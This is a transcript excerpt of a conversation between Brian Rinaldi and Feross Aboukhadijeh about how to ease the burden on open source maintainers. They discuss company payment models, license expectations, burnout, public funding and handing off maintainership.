Brian Rinaldi 50:36 But I do have one question, which is not getting at the actual risk so much as: what can we do for maintainers to help mitigate some of this? Because I agree, part of our problem is that we keep putting more burden on these maintainers, and I think the burden is increasing without necessarily anything to mitigate it. We’re relying on this stuff more, and yet we’re not really providing for the people creating it in the way we should. What do you think are some things we could do, as a community, to help solve

Feross Aboukhadijeh 51:24 that. It’s a great question. I have a lot of opinions on this topic, because I’ve been a maintainer for a really long time, and I ended up deciding that doing open source full time wasn’t something I could do anymore. I’d love to live in a world where, in the future, someone could decide to just do open source. If you think about the value they’re providing to the world by working on open source and sharing this code with all the companies that use it, with all the different folks using it in different ways, the value they’re providing to society is, I think, arguably more than you’d provide as a developer working on closed source code at a single company, which helps one company. So, given that they’re providing that much value to the world, it seems like there ought to be some way to compensate them at the level of what you’d get at a job. If you’re providing arguably more value than you can working on private code, why can’t we compensate maintainers in a similar way? There’s a whole bunch of reasons for that, and they’re really hard to solve. Part of the main problem is that if you give away everything for free, put an MIT license on it, and then turn around and say, “Please pay me,” you’ve kind of already given away the leverage in the relationship. So most companies just won’t pay in that situation, especially when you frame it as a donation, which is how most people do it. It’s really hard for a manager, even someone who cares and wants to do the right thing, to go and say, “Hey guys, I want to donate the company’s money to this random person.”
It doesn’t really work like that. They can buy products, they can pay for support, but they need an invoice, and it needs to be a formal process. You can’t just say, “I’m going to donate money from the company’s bank account to this random open source person who I like, or who might even be my friend.” You can’t really do that. There are obviously people making good efforts here; I think Open Collective and Tidelift, there are folks doing some experimentation and some innovation in the model to make it easier for companies to pay and to help. So paying is one big part of it. Then there’s also the maintainers themselves, who I think create some of the burden. I remember, when I was a maintainer, I was my own worst enemy in some ways. I treated my GitHub issues list as my to-do list, and I let effectively anyone in the world add items to my own personal to-do list. That grew faster than I could fix the issues, and it created a lot of stress and a feeling of, “Oh, I’m doing a bad job,” even though I was working more than eight hours a day, for free, giving away all my work. And I was like, I’m not a bad maintainer; that’s not the right framing of things. I see a lot of maintainers get burned out because they feel the burden of the people who rely on their code, and they take it very personally. They really want to do the right thing, and that can create a lot of stress.
So there’s a mindset shift that I think is helpful there. If you read the terms of the MIT license, it literally says this code is provided “as is,” no guarantees. If we really had that type of philosophy around it, where there’s no support contract on this, and if you want support, that’s a different thing and maybe you should pay me for that, I think that can really help. The problem, I think, is the mixing of the MIT license, the standard open source licenses, and what they legally entitle the user to, which is not much; in terms of support, there’s nothing they’re entitled to. Whereas there’s this social expectation with GitHub that if you have an issue tracker, you’re going to be reading it, you’re going to be engaging, you’re going to be addressing issues. That creates an almost unwritten social obligation, or social expectation, that you’re going to be there and support the users that show up. And then people get all confused about what open source is. Is open source the license, this legal concept? Or is open source the community, the idea of having an open issue tracker? Because you have companies like Apple that release open source code because they’re legally required to, but they put it in a zip file on a random URL on their website that no one visits, and they call it open source. And technically, legally, it is open source, but there’s no community. They don’t take contributions. So when people say open source, they really think of a maintainer who will reply to my issues, read my PRs, be engaged, and take contributions. Anyway, it’s super complicated.
I don’t think we’re going to solve it here. I don’t know, government money toward it could help too. There’s been talk of that, seeing it more as critical infrastructure for the nation. I’ve seen the EU put money toward this, and there’s interest now from the White House around open source security of critical projects. There’s been money going toward that from the Linux Foundation and OpenSSF. There are these different organizations trying to identify critical projects, funnel money to them, and give them resources and stuff like that. So things are improving, but not enough, and not as far as it needs to go, I would say.

Brian Rinaldi 57:13 Yeah, yeah. It definitely is a complicated issue. I’ve even seen it get to the point where, currently, you see a lot of companies jumping out of open source because of a lot of the complications and things like that. Which is a shame, right?

Feross Aboukhadijeh 57:33 Right. You’re talking about the companies that don’t want the cloud providers, like Amazon... Yeah.

Brian Rinaldi 57:40 Yeah, being able to have some other company take their service and just be like, “Oh, hey, we’re going to sell it now.” Yeah, right. So I think we could have a whole other talk about issues around open source, not just security vulnerabilities.

Feross Aboukhadijeh 57:58 Yeah. I mean, I think maintainers are just doing a ton of work, and it’s such a thankless job. Maybe part of it is we just need a better way to hand off projects to new maintainers when people inevitably move on. Some people have kids, they have a family, they don’t want to do it anymore, whatever life changes happen for them. And we don’t really have a good way. Either you don’t pass on maintainership and the package dies, or you do, and then you take on these security risks, as we talked about in my talk. It’s not really a good situation. Yeah.

Brian Rinaldi 58:38 absolutely. Well, hopefully it gets better.
